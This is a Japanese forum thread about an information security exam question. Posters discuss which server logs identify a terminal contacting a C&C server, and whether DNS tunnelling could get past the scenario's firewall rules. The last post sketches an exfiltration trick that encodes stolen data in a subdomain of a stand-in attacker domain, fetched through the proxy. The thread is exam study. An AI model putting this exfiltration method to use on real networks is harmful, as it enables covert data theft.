HOME»情報処理安全確保支援士掲示板»H31春・午後Ⅱ・問1・設問1のb
投稿する
DNSトンネリングのことですか。
社内PC(マルウェア)→社外で、FW1のACL(P3の表1)およびFW2のACL(P4の表2)だと、宛先を外部DNSサーバとする許可ルールは送信元がインターネットしかありませんので、社内PC(マルウェア)から名前解決要求パケットを飛ばしたところで破棄されます。
H31春・午後Ⅱ・問1・設問1のb [1877]
あきむさん(No.1)
表題の設問について、有識者の方にご教示いただけますと幸いです。
https://www.sc-siken.com/pdf/31_haru/pm2_1.pdf
ページ番号5の上から2行目にbが登場します。
「どのサーバのログを確認すれば、C&Cサーバと通信を開始した端末を特定できるか?」という趣旨の問題です。
私の解答:プロキシサーバ
IPA解答:DHCPサーバ
ページ番号3の上から5〜6行目に
と記載があります。
【質問1】
「プロキシサーバ」のログを確認することで上記条件に合致する端末の特定は可能である、と考えておりますが、なぜ不可能なのでしょうか?
【質問2】
「DHCPサーバ」は「プライベートIPアドレスを割り振る機能(のみ)」を持つという解釈をしていますが、なぜDHCPサーバのログを調査するとC&Cサーバと通信開始した端末を特定できるのでしょうか?
上記2点、ご教示いただけますと幸いです。
よろしくお願いいたします。
https://www.sc-siken.com/pdf/31_haru/pm2_1.pdf
ページ番号5の上から2行目にbが登場します。
「どのサーバのログを確認すれば、C&Cサーバと通信を開始した端末を特定できるか?」という趣旨の問題です。
私の解答:プロキシサーバ
IPA解答:DHCPサーバ
ページ番号3の上から5〜6行目に
>プロキシサーバでは、各機器からの全てのアクセスについて、アクセスログを取得している。
と記載があります。
【質問1】
「プロキシサーバ」のログを確認することで上記条件に合致する端末の特定は可能である、と考えておりますが、なぜ不可能なのでしょうか?
【質問2】
「DHCPサーバ」は「プライベートIPアドレスを割り振る機能(のみ)」を持つという解釈をしていますが、なぜDHCPサーバのログを調査するとC&Cサーバと通信開始した端末を特定できるのでしょうか?
上記2点、ご教示いただけますと幸いです。
よろしくお願いいたします。
2025.04.05 18:41
あきむさん(No.2)
すみません、追加で1点、質問させてください。
同じ問題の設問5(3)についてです。
FW1で許可されている「外部DNSサーバ⇔インターネット」の通信を利用し、DNSレスポンスのTXTレコードに窃取した情報を記載して送る、という手法を考えたのですが、これはなぜ不可能なのでしょうか?
同じ問題の設問5(3)についてです。
FW1で許可されている「外部DNSサーバ⇔インターネット」の通信を利用し、DNSレスポンスのTXTレコードに窃取した情報を記載して送る、という手法を考えたのですが、これはなぜ不可能なのでしょうか?
2025.04.05 19:06
GinSanaさん(No.3)
★SC シルバーマイスター
https://www.ipa.go.jp/shiken/mondai-kaiotu/gmcbt8000000ddiw-att/2019h31h_sc_pm2_ans.pdf
を見る限りだと、模範解答はプロキシサーバになってますが・・・。
を見る限りだと、模範解答はプロキシサーバになってますが・・・。
2025.04.06 14:59
あきむさん(No.4)
GinSana様
ご教示いただきありがとうございます。
私の見誤りです。失礼しました。
大変恐縮ですが、設問5(3)の「DNSのTXTレコードを利用して持ち出すことが不可能」な件についてもご教示いただけますと幸いです。
何卒よろしくお願いいたします。
ご教示いただきありがとうございます。
私の見誤りです。失礼しました。
大変恐縮ですが、設問5(3)の「DNSのTXTレコードを利用して持ち出すことが不可能」な件についてもご教示いただけますと幸いです。
何卒よろしくお願いいたします。
2025.04.06 15:21
GinSanaさん(No.5)
★SC シルバーマイスター
>FW1で許可されている「外部DNSサーバ⇔インターネット」の通信を利用し、DNSレスポンスのTXTレコードに窃取した情報を記載して送る、という手法を考えたのですが、これはなぜ不可能なのでしょうか?
DNSトンネリングのことですか。
社内PC(マルウェア)→社外で、FW1のACL(P3の表1)およびFW2のACL(P4の表2)だと、宛先を外部DNSサーバとする許可ルールは送信元がインターネットしかありませんので、社内PC(マルウェア)から名前解決要求パケットを飛ばしたところで破棄されます。
2025.04.06 15:39
あきむさん(No.6)
GinSana様
追加でご教示いただきありがとうございます。
DNSトンネリングが可能かと思っていたのですが、社内PC→外部DNSサーバの通信がそもそもできない、ということですね。
理解しました。
大変助かりました!ありがとうございました。
追加でご教示いただきありがとうございます。
DNSトンネリングが可能かと思っていたのですが、社内PC→外部DNSサーバの通信がそもそもできない、ということですね。
理解しました。
大変助かりました!ありがとうございました。
2025.04.06 17:45
R6秋PM59さん(No.7)
横から失礼します。
http(s)://{encoded_information}.attackerdomain.com/
をgetして、proxyにDNSクエリを発信させるというのは如何でしょうか。
本命はあくまでDNSトンネリングです。😅
「情報をFQDNに含めたURL参照によるプロキシ経由DNSトンネリング」
(34文字)
インスペクションが接続確立試行以前に、FQDNの部分にまで及ぶものであれば、素人の浅知恵ですが。。。
http(s)://{encoded_information}.attackerdomain.com/
をgetして、proxyにDNSクエリを発信させるというのは如何でしょうか。
本命はあくまでDNSトンネリングです。😅
「情報をFQDNに含めたURL参照によるプロキシ経由DNSトンネリング」
(34文字)
インスペクションが接続確立試行以前に、FQDNの部分にまで及ぶものであれば、素人の浅知恵ですが。。。
2025.04.07 20:55